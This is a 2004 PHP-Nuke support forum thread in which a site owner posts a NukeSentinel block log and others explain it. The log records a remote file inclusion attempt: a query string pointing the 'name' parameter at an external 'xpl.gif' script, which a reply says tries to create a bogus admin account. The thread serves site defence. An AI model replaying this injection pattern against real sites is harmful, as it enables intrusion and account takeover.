Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

Agent Inspector
 View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)
Author Message
digibeet
Regular
Regular



Joined: Jul 08, 2004
Posts: 96
Location: Amsterdam, the Netherlands
PostPosted: Sun Jul 25, 2004 7:02 am Reply with quote
A.I. asked me post this so..

Datum & Tijd: 2004-07-25 06:49:24
Geblokkeerd IP: 200.184.48.252
Gebruikers ID: Anonymous (1)
Reden: Misbruik - ANDERS
--------------------
Gebruiks Agent: none
Query String: ************/modules.php?name=http://dcha0s.tripod.com.br/xpl.gif?
Doorgestuurd Voor: none
Client IP: none
Remote Adres: 200.184.48.252
Remote Poort: 3554
Aanvraag Methode: GET
--------------------
Who-Is voor IP
200.184.48.252




OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY

ReferralServer: [ Only registered users can see links on this board! Get registered or login! ]

NetRange: 200.0.0.0 - 200.255.255.255
CIDR: 200.0.0.0/8
NetName: LACNIC-200
NetHandle: NET-200-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
NameServer: NS2.DNS.BR
Comment: This IP address range is under LACNIC responsibility for further
Comment: allocations to users in LACNIC region.
Comment: Please see [ Only registered users can see links on this board! Get registered or login! ] for further details, or check the
Comment: WHOIS server located at whois.lacnic.net
RegDate: 2002-07-27
Updated: 2004-03-18

TechHandle: LACNIC-ARIN
TechName: LACNIC Hostmaster
TechPhone: (+55) 11 5509-3522
TechEmail: [ Only registered users can see links on this board! Get registered or login! ]

OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3522
OrgTechEmail: [ Only registered users can see links on this board! Get registered or login! ]

Ideas.. anybody?

Thanks,


Fred Twisted Evil

_________________
"Grasp the subject, the words will follow."
Cato the Elder (234 BC - 149 BC)
Roman orator & politician. 
View user's profile Send private message Visit poster's website
sixonetonoffun
Spouse Contemplates Divorce



Joined: Jan 02, 2003
Posts: 2496
PostPosted: Sun Jul 25, 2004 9:08 am Reply with quote
name=http:// is what it triggered on. The gif? is likely a script I didn't check it out but theres some floating around that mimick a remote linked image but actually try to create a bogus admin account.

_________________
[b][size=5]openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR
| GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30[/size:2b8 
View user's profile Send private message
BobMarion
Former Admin in Good Standing



Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)
PostPosted: Sun Jul 25, 2004 9:35 am Reply with quote
You will also notice that the IP is a Brazilian IP which is known for using this very same attack on many sites. I get this report many times a day from all over Brazil.

_________________
Bob Marion
Codito Ergo Sum
http://www.nukescripts.net 
View user's profile Send private message Send e-mail Visit poster's website
digibeet
PostPosted: Sun Jul 25, 2004 10:29 am Reply with quote
Dind't know that, it whas the first time for me Very Happy

Thanks Bob,

Fred Mr. Green
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©